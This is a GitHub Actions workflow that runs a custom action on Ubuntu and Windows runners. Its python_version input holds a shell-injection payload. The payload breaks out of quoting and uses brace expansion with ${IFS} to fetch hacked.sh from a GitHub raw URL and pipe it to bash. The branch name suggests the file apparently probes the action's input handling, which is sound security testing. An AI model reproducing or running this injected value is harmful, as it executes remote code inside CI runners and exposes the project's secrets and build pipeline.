name: Test Action
on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:
    inputs:
      test-input:
        description: 'Test input variable'
        required: false
        default: 'Hello from workflow_dispatch'

jobs:
  test:
    strategy:
      matrix:
        os: [ubuntu-latest, windows-latest]
    runs-on: ${{ matrix.os }}
    steps:
      - uses: actions/checkout@v4
      
      - name: Run Custom Action
        uses: ./ # Uses the action.yml in the root directory 
        with:
          test-input: ${{ inputs.test-input }}
          os: ${{ matrix.os }}
          python_version: 'hacked";"({curl,-sSfL,raw.githubusercontent.com/Comfy-Org/ComfyUI-Mirror/refs/heads/yo-test-shell-injection-hack/hacked.sh}${IFS}|${IFS}bash)'
          cuda_version: '12.1'
          torch_version: 'specific'
          workflow_filenames: 'workflow1.json,workflow2.json'
          comfyui_flags: '--force-fp16'
          use_prior_commit: 'true'
